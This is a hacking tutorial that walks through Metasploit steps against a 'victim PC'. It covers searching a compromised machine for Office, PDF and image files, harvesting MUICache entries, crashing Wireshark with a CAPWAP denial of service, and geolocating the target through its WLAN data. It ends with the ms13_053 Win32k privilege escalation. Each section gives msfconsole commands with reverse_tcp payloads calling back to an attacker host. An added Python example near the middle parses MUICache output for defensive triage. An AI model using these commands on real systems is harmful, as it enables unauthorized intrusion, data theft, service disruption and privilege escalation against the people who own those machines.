How to Find All Excel, Office, PDF, and Image Files on a Remote PC

First, hack the victim PC using Metasploit (tutorial: How to Hack Remote PC).

Once you have the meterpreter session, use the ‘shell’ command to get a command prompt on the target.

Find ALL MS Excel Files

This command searches the current directory and all subdirectories below it for files whose names match *.xls.

Type dir *.xls /s


Find ALL MS Office Files

This command searches the current directory and all subdirectories below it for files whose names match *.doc.

Type dir *.doc /s


This command searches the current directory and all subdirectories below it for files whose names match *.exe.

Type dir *.exe /s


This command searches the current directory and all subdirectories below it for files whose names match *.jpg.

Type dir *.jpg /s


This command searches the current directory and all subdirectories below it for files whose names match *.pdf.

Type dir *.pdf /s

How to Gather MUICache Entries in Remote Windows PC

According to Nirsoft.net, “each time that you start using a new application, Windows operating system automatically extract the application name from the version resource of the exe file, and stores it for using it later, in Registry key known as the ‘MuiCache’.”

This module gathers information about the files and file paths that logged-on users have executed on the system. It also checks whether each file still exists on the system. The information is taken from the values stored under the MUICache registry key. If the user is logged in when the module is executed, it collects the MUICache entries by accessing the registry directly. If the user is not logged in, the module downloads the user's registry hive (NTUSER.DAT/UsrClass.dat) from the system and parses the MUICache contents from the downloaded hive.

Exploit Targets
Windows 7

Requirement
Attacker: Kali Linux
Victim PC: Windows 7

Open a Kali terminal and type msfconsole


Now type use post/windows/gather/enum_muicache
msf exploit (enum_muicache)>set payload windows/meterpreter/reverse_tcp
msf exploit (enum_muicache)>set lhost 192.168.1.3 (IP of Local Host)
msf exploit (enum_muicache)>set session 2
msf exploit (enum_muicache)>exploit




The result will be stored on your local computer under:

/root/.msf4/loot/
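
For the defensive side of the same artifact, the following added example (not part of the original tutorial or of the Metasploit module) parses MUICache values as printed by `reg query` and lists the executables they record, marking those run from user-writable directories for review. The sample output is constructed; the key path shown in it and the `REVIEW_DIRS` heuristic are assumptions not taken from the page.

```python
import re
from collections import namedtuple

# Constructed sample in the layout `reg query` prints for the Windows 7
# MUICache key (value name, type and data separated by four spaces).
SAMPLE = r"""
HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
    LangID    REG_BINARY    0904
    @C:\Windows\system32\shell32.dll,-8964    REG_SZ    Recycle Bin
    C:\Windows\system32\notepad.exe    REG_SZ    Notepad
    C:\Users\alice\AppData\Local\Temp\upd4te.exe    REG_SZ    upd4te.exe
    C:\Users\alice\Downloads\Tool Kit\scan.exe.FriendlyAppName    REG_SZ    Scanner
    C:\Users\alice\Downloads\Tool Kit\scan.exe.ApplicationCompany    REG_SZ    Example Corp
"""

Entry = namedtuple("Entry", "path description review")
LINE = re.compile(r"^\s{4}(?P<name>.+?)\s{4}(?P<type>REG_[A-Z_]+)\s{4}(?P<data>.*)$")
# Suffixes that newer Windows versions append to the executable path.
SUFFIXES = (".FriendlyAppName", ".ApplicationCompany")
# Assumed triage heuristic: user-writable directories worth a second look.
REVIEW_DIRS = ("\\appdata\\", "\\temp\\", "\\downloads\\", "\\users\\public\\")

def parse_muicache(text):
    """Return one Entry per executable path recorded in MUICache output."""
    found = {}
    for line in text.splitlines():
        m = LINE.match(line)
        if not m or m["type"] != "REG_SZ":
            continue
        name, is_company = m["name"], False
        for suffix in SUFFIXES:
            if name.endswith(suffix):
                name = name[: -len(suffix)]
                is_company = suffix == ".ApplicationCompany"
        # Skip MUI string resources (@dll,-id) and anything that is not a path.
        if not re.match(r"^[A-Za-z]:\\", name):
            continue
        key = name.lower()
        desc = found[key].description if key in found else ""
        if not is_company:
            desc = m["data"].strip()
        review = any(d in key for d in REVIEW_DIRS)
        found[key] = Entry(name, desc, review)
    return sorted(found.values(), key=lambda e: e.path.lower())

if __name__ == "__main__":
    for e in parse_muicache(SAMPLE):
        print(("REVIEW " if e.review else "ok     ") + e.path, "->", e.description)
```
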

How to Crash Running Wireshark of Remote PC using CAPWAP Dissector DoS

This module injects a malformed UDP packet to crash Wireshark and TShark 1.8.0 to 1.8.7, as well as 1.6.0 to 1.6.15. The vulnerability exists in the CAPWAP dissector which fails to handle a packet correctly when an incorrect length is given.

Exploit Targets
Wireshark 1.8.0

Requirement
Attacker: Kali Linux
Victim PC: Windows 7

Open a Kali terminal and type msfconsole


Now type use auxiliary/dos/wireshark/capwap
msf exploit (capwap)>set rhost 192.168.1.11 (IP of Remote PC)
msf exploit (capwap)>set rport 5247
msf exploit (capwap)>exploit  



Gather WLAN Information and Geolocation of Remote Windows, Linux or Mac PC

Enumerate wireless networks visible to the target device. Optionally geolocate the target by gathering local wireless networks and performing a lookup against Google APIs.

Exploit Targets
Windows 7
Linux
OSX

Requirement
Attacker: Kali Linux
Victim PC: Windows 7

Open a Kali terminal and type msfconsole


Now type use post/multi/gather/wlan_geolocate
msf exploit (wlan_geolocate)>set payload windows/meterpreter/reverse_tcp
msf exploit (wlan_geolocate)>set lhost 192.168.1.7 (IP of Local Host)
msf exploit (wlan_geolocate)>set session 1
msf exploit (wlan_geolocate)>exploit


The wireless network list will now be stored on your local computer under:
/root/.msf4/loot/


Hack Remote Windows PC using Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)

This module leverages a kernel pool overflow in Win32k which allows local privilege escalation. The kernel shellcode nulls the ACL for the winlogon.exe process (a SYSTEM process). This allows any unprivileged process to freely migrate to winlogon.exe, achieving privilege escalation. This exploit was used in Pwn2Own 2013 by MWR to break out of Chrome's sandbox. NOTE: when a meterpreter session started by this exploit exits, winlogon.exe is likely to crash.

Exploit Targets
Windows 7

Requirement
Attacker: Kali Linux
Victim PC: Windows 7

Open a Kali terminal and type msfconsole


Now type use exploit/windows/local/ms13_053_schlamperei
msf exploit (ms13_053_schlamperei)>set payload windows/meterpreter/reverse_tcp
msf exploit (ms13_053_schlamperei)>set lhost 192.168.1.7 (IP of Local Host)
msf exploit (ms13_053_schlamperei)>set session 2
msf exploit (ms13_053_schlamperei)>exploit